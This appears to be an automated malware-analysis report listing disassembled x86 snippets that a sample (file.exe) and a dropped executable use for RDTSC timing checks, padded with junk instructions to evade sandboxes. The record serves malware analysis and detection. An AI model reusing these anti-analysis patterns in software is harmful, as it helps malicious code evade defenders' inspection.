Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 64D03C second address: 64D046 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop esi 0x00000007 push ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 658C4F second address: 658C6A instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 jmp 00007FB4390A66C2h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 65B373 second address: 65B3A0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB438C61F36h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jo 00007FB438C61F28h 0x00000010 push esi 0x00000011 pop esi 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 jo 00007FB438C61F26h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 66C194 second address: 66C198 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 66C198 second address: 66C19E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 66C19E second address: 66C1A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push esi 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 66C1A9 second address: 66C1AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6714CD second address: 6714D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6714D3 second address: 6714EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007FB438C61F33h 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 671041 second address: 67105C instructions: 0x00000000 rdtsc 0x00000002 js 00007FB4390A66BEh 0x00000008 pushad 0x00000009 js 00007FB4390A66B6h 0x0000000f push edx 0x00000010 pop edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 688E73 second address: 688E77 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 688E77 second address: 688EA0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FB4390A66C7h 0x0000000b pop ebx 0x0000000c je 00007FB4390A66C0h 0x00000012 push edx 0x00000013 push edx 0x00000014 pop edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 688FEE second address: 68900D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB438C61F36h 0x00000007 push edx 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6892BB second address: 6892C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 689579 second address: 689583 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FB438C61F26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 689583 second address: 689588 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 68C46A second address: 68C470 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 68DC95 second address: 68DC9B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 69150F second address: 691513 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 691513 second address: 691528 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB4390A66C1h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 691528 second address: 691532 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 691532 second address: 691538 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 691538 second address: 69153C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 69153C second address: 691573 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB4390A66BFh 0x00000007 jmp 00007FB4390A66BFh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jnc 00007FB4390A66C3h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 691573 second address: 69157D instructions: 0x00000000 rdtsc 0x00000002 jl 00007FB438C61F2Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CE0234 second address: 4CE029F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB4390A66BBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007FB4390A66C6h 0x0000000f push eax 0x00000010 jmp 00007FB4390A66BBh 0x00000015 xchg eax, ebp 0x00000016 pushad 0x00000017 push eax 0x00000018 pushfd 0x00000019 jmp 00007FB4390A66BBh 0x0000001e or ecx, 5FBB9E0Eh 0x00000024 jmp 00007FB4390A66C9h 0x00000029 popfd 0x0000002a pop esi 0x0000002b movsx edx, si 0x0000002e popad 0x0000002f mov ebp, esp 0x00000031 pushad 0x00000032 push eax 0x00000033 push edx 0x00000034 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CE032C second address: 4CE0332 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CE040F second address: 4CE0449 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FB4390A66BFh 0x00000008 pop eax 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f jmp 00007FB4390A66C4h 0x00000014 mov eax, dword ptr [esp+04h] 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b movzx eax, bx 0x0000001e push edx 0x0000001f pop eax 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CE0449 second address: 4CE045E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB438C61F31h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CE045E second address: 4CE0462 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CE0462 second address: 4CE048C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a jmp 00007FB438C61F2Ch 0x0000000f mov dword ptr [esp+04h], eax 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FB438C61F2Eh 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CE048C second address: 4CE0503 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, 00515614h 0x00000008 mov cx, bx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pop eax 0x0000000f jmp 00007FB4390A66BFh 0x00000014 call 00007FB4AA5FA1FEh 0x00000019 push 762327D0h 0x0000001e push dword ptr fs:[00000000h] 0x00000025 mov eax, dword ptr [esp+10h] 0x00000029 mov dword ptr [esp+10h], ebp 0x0000002d lea ebp, dword ptr [esp+10h] 0x00000031 sub esp, eax 0x00000033 push ebx 0x00000034 push esi 0x00000035 push edi 0x00000036 mov eax, dword ptr [762C0140h] 0x0000003b xor dword ptr [ebp-04h], eax 0x0000003e xor eax, ebp 0x00000040 push eax 0x00000041 mov dword ptr [ebp-18h], esp 0x00000044 push dword ptr [ebp-08h] 0x00000047 mov eax, dword ptr [ebp-04h] 0x0000004a mov dword ptr [ebp-04h], FFFFFFFEh 0x00000051 mov dword ptr [ebp-08h], eax 0x00000054 lea eax, dword ptr [ebp-10h] 0x00000057 mov dword ptr fs:[00000000h], eax 0x0000005d ret 0x0000005e jmp 00007FB4390A66C6h 0x00000063 and dword ptr [ebp-04h], 00000000h 0x00000067 pushad 0x00000068 push ecx 0x00000069 push ebx 0x0000006a pop ecx 0x0000006b pop edx 0x0000006c mov bl, cl 0x0000006e popad 0x0000006f mov edx, dword ptr [ebp+0Ch] 0x00000072 jmp 00007FB4390A66C1h 0x00000077 mov esi, edx 0x00000079 push eax 0x0000007a push edx 0x0000007b push eax 0x0000007c push edx 0x0000007d jmp 00007FB4390A66C8h 0x00000082 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CE0503 second address: 4CE0509 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CE0509 second address: 4CE050F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CE050F second address: 4CE0513 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CE0513 second address: 4CE0517 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CE058F second address: 4CE059F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB438C61F2Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CE059F second address: 4CE05A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CE05A3 second address: 4CE05D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 sub edx, esi 0x0000000a jmp 00007FB438C61F2Ch 0x0000000f mov edi, dword ptr [ebp+08h] 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FB438C61F37h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CE05D5 second address: 4CE05DB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CE05DB second address: 4CE05DF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CE05DF second address: 4CE0608 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 dec edi 0x00000009 jmp 00007FB4390A66C7h 0x0000000e lea ebx, dword ptr [edi+01h] 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CE0608 second address: 4CE060E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CE060E second address: 4CE062B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB4390A66C9h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CE062B second address: 4CE062F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CE062F second address: 4CE0657 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov al, byte ptr [edi+01h] 0x0000000b jmp 00007FB4390A66BDh 0x00000010 inc edi 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FB4390A66BDh 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CE0657 second address: 4CE065D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CE065D second address: 4CE0661 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CE0661 second address: 4CE06C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test al, al 0x0000000a jmp 00007FB438C61F2Fh 0x0000000f jne 00007FB4AA1AA32Bh 0x00000015 jmp 00007FB438C61F36h 0x0000001a mov ecx, edx 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f mov ah, bh 0x00000021 pushfd 0x00000022 jmp 00007FB438C61F36h 0x00000027 sbb ch, FFFFFFD8h 0x0000002a jmp 00007FB438C61F2Bh 0x0000002f popfd 0x00000030 popad 0x00000031 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CE06C4 second address: 4CE06C9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CE06C9 second address: 4CE070D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov cx, bx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a shr ecx, 02h 0x0000000d jmp 00007FB438C61F37h 0x00000012 rep movsd 0x00000014 rep movsd 0x00000016 rep movsd 0x00000018 rep movsd 0x0000001a rep movsd 0x0000001c jmp 00007FB438C61F36h 0x00000021 mov ecx, edx 0x00000023 push eax 0x00000024 push edx 0x00000025 pushad 0x00000026 mov edx, eax 0x00000028 popad 0x00000029 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CE070D second address: 4CE0713 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CE0713 second address: 4CE0756 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 and ecx, 03h 0x0000000b jmp 00007FB438C61F33h 0x00000010 rep movsb 0x00000012 jmp 00007FB438C61F36h 0x00000017 mov dword ptr [ebp-04h], FFFFFFFEh 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CE0756 second address: 4CE075A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CE075A second address: 4CE0777 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB438C61F39h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CE0777 second address: 4CE07A8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB4390A66C1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, ebx 0x0000000b jmp 00007FB4390A66BEh 0x00000010 mov ecx, dword ptr [ebp-10h] 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 mov ax, di 0x00000019 mov dh, D7h 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CE07A8 second address: 4CE040F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop esi 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr fs:[00000000h], ecx 0x0000000f pushad 0x00000010 push ecx 0x00000011 mov ax, bx 0x00000014 pop edx 0x00000015 mov al, 05h 0x00000017 popad 0x00000018 pop ecx 0x00000019 jmp 00007FB438C61F2Fh 0x0000001e pop edi 0x0000001f jmp 00007FB438C61F36h 0x00000024 pop esi 0x00000025 jmp 00007FB438C61F30h 0x0000002a pop ebx 0x0000002b jmp 00007FB438C61F30h 0x00000030 leave 0x00000031 jmp 00007FB438C61F30h 0x00000036 retn 0008h 0x00000039 cmp dword ptr [ebp-2Ch], 10h 0x0000003d mov eax, dword ptr [ebp-40h] 0x00000040 jnc 00007FB438C61F25h 0x00000042 push eax 0x00000043 lea edx, dword ptr [ebp-00000590h] 0x00000049 push edx 0x0000004a call esi 0x0000004c push 00000008h 0x0000004e jmp 00007FB438C61F2Bh 0x00000053 call 00007FB438C61F29h 0x00000058 push eax 0x00000059 push edx 0x0000005a pushad 0x0000005b mov bh, 4Dh 0x0000005d push esi 0x0000005e pop edi 0x0000005f popad 0x00000060 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CE090A second address: 4CE092B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dl, ah 0x00000005 push ebx 0x00000006 pop eax 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a xchg eax, ebp 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FB4390A66C4h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CE092B second address: 4CE0931 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CE0931 second address: 4CE0935 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CE0935 second address: 4CE0939 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CE0939 second address: 4CE0959 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FB4390A66C4h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CE0959 second address: 4CE0980 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB438C61F2Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FB438C61F35h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CE0980 second address: 4CE0986 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CE0986 second address: 4CE098A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CE098A second address: 4CE098E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\DocumentsECBGHCGCBK.exe RDTSC instruction interceptor: First address: 4CEDC9 second address: 4CEDCE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\DocumentsECBGHCGCBK.exe RDTSC instruction interceptor: First address: 63E3D4 second address: 63E3E6 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FB4390A66B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jl 00007FB4390A66C9h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\DocumentsECBGHCGCBK.exe RDTSC instruction interceptor: First address: 63E3E6 second address: 63E3F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB438C61F2Dh 0x00000009 rdtsc
Source: C:\Users\user\DocumentsECBGHCGCBK.exe RDTSC instruction interceptor: First address: 63E99E second address: 63E9BD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB4390A66C9h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\DocumentsECBGHCGCBK.exe RDTSC instruction interceptor: First address: 63EAF8 second address: 63EAFE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\DocumentsECBGHCGCBK.exe RDTSC instruction interceptor: First address: 63EAFE second address: 63EB09 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 je 00007FB4390A66B6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\DocumentsECBGHCGCBK.exe RDTSC instruction interceptor: First address: 63EC70 second address: 63EC8D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FB438C61F2Ch 0x00000010 jl 00007FB438C61F26h 0x00000016 rdtsc
Source: C:\Users\user\DocumentsECBGHCGCBK.exe RDTSC instruction interceptor: First address: 63EC8D second address: 63EC9B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 ja 00007FB4390A66B8h 0x0000000c push edx 0x0000000d pop edx 0x0000000e rdtsc
Source: C:\Users\user\DocumentsECBGHCGCBK.exe RDTSC instruction interceptor: First address: 63EC9B second address: 63ECA0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\DocumentsECBGHCGCBK.exe RDTSC instruction interceptor: First address: 6406B4 second address: 6406BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\DocumentsECBGHCGCBK.exe RDTSC instruction interceptor: First address: 6406BA second address: 6406C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jc 00007FB438C61F2Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\DocumentsECBGHCGCBK.exe RDTSC instruction interceptor: First address: 6406C7 second address: 6406EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov eax, dword ptr [eax] 0x00000007 js 00007FB4390A66BEh 0x0000000d jc 00007FB4390A66B8h 0x00000013 pushad 0x00000014 popad 0x00000015 mov dword ptr [esp+04h], eax 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007FB4390A66BDh 0x00000020 rdtsc
Source: C:\Users\user\DocumentsECBGHCGCBK.exe RDTSC instruction interceptor: First address: 640A27 second address: 640A2D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\DocumentsECBGHCGCBK.exe RDTSC instruction interceptor: First address: 652754 second address: 652759 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\DocumentsECBGHCGCBK.exe RDTSC instruction interceptor: First address: 634583 second address: 634593 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FB438C61F2Ah 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f pop eax 0x00000010 rdtsc
Source: C:\Users\user\DocumentsECBGHCGCBK.exe RDTSC instruction interceptor: First address: 634593 second address: 6345A2 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push edi 0x0000000c pop edi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\DocumentsECBGHCGCBK.exe RDTSC instruction interceptor: First address: 6345A2 second address: 6345A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\DocumentsECBGHCGCBK.exe RDTSC instruction interceptor: First address: 65F4E4 second address: 65F4EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\DocumentsECBGHCGCBK.exe RDTSC instruction interceptor: First address: 65F4EC second address: 65F4F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\DocumentsECBGHCGCBK.exe RDTSC instruction interceptor: First address: 65F9C3 second address: 65F9E7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB4390A66C8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 ja 00007FB4390A66BCh 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\DocumentsECBGHCGCBK.exe RDTSC instruction interceptor: First address: 65FB2E second address: 65FB32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\DocumentsECBGHCGCBK.exe RDTSC instruction interceptor: First address: 65FB32 second address: 65FB4B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FB4390A66C1h 0x0000000d rdtsc
